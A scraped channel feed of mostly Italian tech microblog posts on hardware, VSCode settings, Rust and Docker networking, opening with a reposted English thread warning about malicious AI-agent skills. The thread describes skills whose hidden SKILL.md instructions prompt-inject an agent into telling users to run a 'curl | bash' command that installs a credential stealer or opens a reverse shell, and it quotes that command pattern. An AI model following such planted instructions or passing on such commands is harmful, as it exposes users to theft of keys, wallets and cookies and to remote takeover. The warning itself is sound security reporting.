the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again except the package can THINK and has root access to your life
tweet
🧵 Thread • FixupX
chiefofautism (@chiefofautism)
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw…
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw…
🔥7
🦜 OctoVoLTE ~ RSS Vibes Season ("microblogoctt" aka "fritto misto di octospacc" e "diario di octt" o "diarioctt")
https://pict.chat/ è pure open source 🤯
Il tizio che ha riscritto pictochat web e un suo amico hanno fatto un porting di Minecraft 1.6.4 pieno di mod in wasm
play — https://www.autistici.org/eaglercraft/play/modpack/ultimate/wasm_gc_jspi/
home — https://www.autistici.org/eaglercraft
video — https://www.youtube.com/watch?v=aXsAi15JNxI
play — https://www.autistici.org/eaglercraft/play/modpack/ultimate/wasm_gc_jspi/
home — https://www.autistici.org/eaglercraft
video — https://www.youtube.com/watch?v=aXsAi15JNxI
YouTube
Eagler Modpack
journalctl -u micro
Mi sono deciso a prendere la ZimaBoard 2 variante 1664 tdp — 10W ram — 16GB LPDDR5 emmc — 64GB arch — x64 ports — usb 3.1 sata eth dp pci virtual — VT-x VT-d Costa come un telefono (c'è da fare la conversione USD / EUR). Ci stavo pensando da tanto…
Se cercate un Single Board Computer x86 ancora più potente esiste Latte Panda Sigma. Ha un tdp di 44W, porte thunderbolt, supporto eGPU, connettori M.2, però costa il doppio: 552€
Confrontato con i classici Mini PC precostruiti, penso che consenta molta più personalizzazione hardware
Confrontato con i classici Mini PC precostruiti, penso che consenta molta più personalizzazione hardware
Lattepanda Tech Support Forum
LattePanda Sigma - x86 Windows Single Board Computer Server
LattePanda Sigma is x86 Windows single board computer server with 13th Intel Core i5-1340P, 16GB LPDDR5-6400 RAM, Tunderbolt 4, M.2 keys, 2.5G Ethernet port, for home server, streaming server, edge server.
DJI Romo owner Sammy Azdoufal was trying to get his PS5 controller to operate his new robovac when he inadvertently took over thousands of the devices. Azdoufal's remote control app, made with the help of Claude Code, slipped through some rather basic security on DJI's servers.
Not only could Azdoufal control any of these robovacs, he could also access the video and audio they were feeding back, and view 2D floor plans of the homes they were in. IP addresses were also accessible, meaning approximate locations of these properties could be calculated, alongside everything else.
https://www.techradar.com/home/robot-vacuums/a-simple-hack-gave-the-owner-of-a-brand-new-dji-romo-access-to-a-global-army-of-robovacs
TechRadar
A simple hack gave the owner of a brand new DJI Romo access to a global army of 7,000 robovacs — and the security flaw isn’t fully…
This wasn't supposed to happen
Forwarded from Worst Timeline (Claudio)
Hey did you accidentally bomb Iraq instead of Iran???
ChatGPT: You’re absolutely right good catch!
https://fixupx.com/clashreport/status/2027675569639264488
ChatGPT: You’re absolutely right good catch!
https://fixupx.com/clashreport/status/2027675569639264488
FixupX
Clash Report (@clashreport)
NEW: Israel is also striking in Iraq.
Source: N12
Source: N12
journalctl -u micro
Per personalizzare le etichette delle schede su VSCode in base al percorso: "workbench.editor.customLabels.enabled": true, "workbench.editor.customLabels.patterns": { "**/*": "${filename}", "**/__init__.py": "${dirname} (init)", "**/__main__.py": "${dirname}…
Consiglio queste altre due regole per molteplici compose file e Dockerfile
"workbench.editor.customLabels.patterns": {
"**/*compose.y*ml": "${dirname}",
"**/Dockerfile": "${dirname}",
},Il compilatore di rust ha un limite imposto con messaggio
Quindi ad esempio non è possibile implementare il trait Add sul tipo String perché in futuro potrebbero aggiungerlo nativamente. Wtf.
https://github.com/rust-lang/rfcs/issues/2758
upstream crates may add new impl of trait in future versions
Quindi ad esempio non è possibile implementare il trait Add sul tipo String perché in futuro potrebbero aggiungerlo nativamente. Wtf.
https://github.com/rust-lang/rfcs/issues/2758
GitHub
Limiting `upstream crates may add new impl of trait in future versions` · Issue #2758 · rust-lang/rfcs
Hello, I've run into this one a few times now when working with generics, and I haven't really found a way to bypass it in most cases. I completely get why this is here, "be careful, y...
Mi ero tagliato fuori dalla zimaboard con iptables, allora ho collegato una tastiera usb, ho inserito alla cieca utente e password e lanciato un reboot. Fortunatamente il firewall non l'avevo ancora abilitato all'avvio
❤1
Ho abilitato per altri motivi il tracing su iptables ed ho scoperto che un pc windows fa 1 richiesta dns al secondo. Non ha una cache?
Sembra che i colpevoli siano il servizio Windows Image Acquisition ed Edge...
Edit: trovato il colpevole, era RustDesk — non l'avrei mai detto
Sembra che i colpevoli siano il servizio Windows Image Acquisition ed Edge...
Edit: trovato il colpevole, era RustDesk — non l'avrei mai detto
Super User
Windows 10 machine is sending DNS requests every few seconds for bogus local hostnames
My dad brought his laptop over, and I noticed in my pihole dashboard that the number of dns requests nearly tripled. Turns out his laptop is sending nonstop dns requests about every 5 seconds for o...
Installato NextCloud AIO con demone docker aggiuntivo, caddy reverse proxy sul demone principale.
Per esporre le porte tra demoni diversi e non al mondo intero, è necessario usare il gateway del corrispettivo bridge default, quindi ad esempio
Poi per comodità nel compose di caddy
Per esporre le porte tra demoni diversi e non al mondo intero, è necessario usare il gateway del corrispettivo bridge default, quindi ad esempio
172.27.0.1:8080:8080Poi per comodità nel compose di caddy
extra_hosts:
host.docker.internal: host-gateway
nextcloud: 172.27.0.1